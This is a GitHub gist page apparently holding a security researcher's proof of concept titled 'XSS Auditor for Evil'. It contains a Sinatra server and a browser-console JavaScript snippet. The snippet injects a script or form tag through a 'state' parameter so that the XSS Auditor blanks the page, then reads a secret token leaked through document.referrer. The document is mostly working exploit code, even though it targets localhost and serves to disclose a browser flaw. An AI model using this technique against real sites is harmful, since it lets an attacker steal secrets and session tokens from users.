Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
XSS Auditor for Evil
require 'sinatra'
require 'securerandom'
=begin
Execute the following JavaScript on any domain, you can use web
inspector console.
Set noblock to remove mode=block and see <form> action=about:blank
case(requires user interaction)
var block = false;
if(block){
var cut_me = encodeURIComponent('<script
src="http://localhost:4567/some.js"></script>');
}else{
var cut_me = encodeURIComponent('<form action="/asdf">');
}
var playground = window.open(
'http://127.0.0.1:4567/auth?'+(block?'':'noblock=1&')+'state='+cut_me,
'n','height=1,width=1');
var int = setInterval(function(){
if(playground.document){
//it's about:blank now!
alert('Leaked: '+playground.document.referrer);
playground.close();
clearInterval(int);
}
}, 100);
=end
get '/auth' do
redirect "/#{'noblock' if
params[:noblock]}?secret=#{SecureRandom.hex(10)}&state=#{params[:state]}"
end
get '/' do
#sinatra sends X-XSS-Protection:1; mode=block by default
return r=<<HTML
<html>
<head>
<script src="http://localhost:4567/some.js"></script>
</head>
</html>
HTML
end
get '/noblock' do
headers['X-XSS-Protection'] = '1;' #no block mode
return r=<<HTML
<html>
<head>
<script src="http://localhost:4567/some.js"></script>
</head>
<body>
<form action="/asdf">
<input type="submit" value="CLICK ME! NOW!">
<input name="one" value="two">
</form>
<a href="javascript:omg(0)">link</a>
</body>
</html>
HTML
end
get '/some.js' do
'console.log("swaaag")'
end
Owner

homakov commented Feb 7, 2013

fsdfsdf

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment